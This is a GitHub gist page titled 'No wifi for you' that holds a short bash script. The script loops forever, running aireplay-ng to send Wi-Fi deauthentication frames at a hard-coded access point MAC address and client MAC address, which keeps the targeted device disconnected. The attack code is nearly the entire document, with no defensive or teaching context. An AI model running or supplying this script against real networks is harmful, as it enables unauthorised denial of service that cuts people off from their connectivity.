Skip to content

Instantly share code, notes, and snippets.

@lionaneesh
Created April 29, 2015 04:54
Show Gist options
  • Save lionaneesh/66479d03b41907f00bc9 to your computer and use it in GitHub Desktop.
Save lionaneesh/66479d03b41907f00bc9 to your computer and use it in GitHub Desktop.
No wifi for you
ACCESS_POINT="C4:0A:CB:2D:81:B4"
DEVICE_POINT="A4:DB:30:D9:55:14"
while :
do
sudo aireplay-ng -0 1 -a "$ACCESS_POINT" -c "$DEVICE_POINT" mon0 --ignore-negative-one;
sleep 1
done
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment